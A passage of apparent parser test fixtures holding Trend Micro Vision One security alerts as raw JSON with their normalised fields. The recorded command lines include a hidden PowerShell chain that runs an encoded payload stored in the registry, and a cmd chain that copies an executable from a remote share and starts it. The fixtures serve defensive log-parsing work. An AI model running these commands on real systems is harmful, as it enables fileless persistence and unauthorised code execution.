[\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Credential Dumping via Mimikatz", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "id": "shockwave\\sam", + "name": "sam" + } + } + + ``` + + +=== "test_project_injection.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": \"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Process Injection from Windows Temporary Location to System32", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3" + }, + "@timestamp": "2024-07-23T07:49:48Z", + "host": { + "id": "7E8FDBEF-FFF7-4C41-9E33-171366D30299", + "ip": [ + "19.112.87.74" + ], + "name": "CHTX-XMEDICA-2K12.windows10.local" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "SesProbe-31944.exe ", + "executable": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\54\\SesProbe-31944.exe", + "hash": { + "sha1": "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "sha256": "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303" + }, + "parent": { + "command_line": "\"C:\\WINDOWS\\system32\\CMD.exe\" /CCD C:\\Users\\USERNAME\\AppData\\Local\\Temp\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\tsclient\\SESPRO\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S", + "executable": "C:\\Windows\\System32\\cmd.exe", + "hash": { + "sha256": "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + } + }, + "pid": 5552 + }, + "related": { + "hash": [ + "3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F", + "7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303", + "A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502" + ], + "ip": [ + "19.112.87.74" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Process Injection from Windows Temporary Location to System32" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "incident_id": "IC-14558-20240722-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } + + ``` + + +=== "test_registry.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open 